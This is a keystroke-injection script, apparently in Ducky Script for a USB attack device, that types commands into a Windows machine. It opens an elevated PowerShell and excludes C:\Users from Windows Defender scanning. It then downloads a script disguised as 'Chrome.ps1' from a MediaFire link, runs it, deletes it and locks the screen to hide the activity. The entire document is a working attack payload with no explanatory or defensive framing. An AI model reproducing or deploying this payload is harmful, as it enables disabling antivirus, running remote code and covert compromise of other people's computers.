DELAY 1000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING powershell
DELAY 400
ENTER
DELAY 1000
STRING start-process PowerShell -verb runas
ENTER
DELAY 1000
LEFT
DELAY 100
ENTER
DELAY 1000
STRING Set-MpPreference -ExclusionPath C:\Users
ENTER
DELAY 500
STRING exit
ENTER
DELAY 100
CONTROL ESCAPE
DELAY 400
STRING powershell
DELAY 400
ENTER
DELAY 1000
STRING (New-Object System.Net.WebClient).DownloadFile("https://download1484.mediafire.com/m3gy6obtliyg/gawvhcnpkn2kuoa/Chrome1.ps1","$env:USERPROFILE\Chrome.ps1")
ENTER
DELAY 2000
STRING ./Chrome.ps1
ENTER
DELAY 5000
STRING del Chrome.ps1
ENTER
DELAY 1000
ALT F4
DELAY 1000
GUI l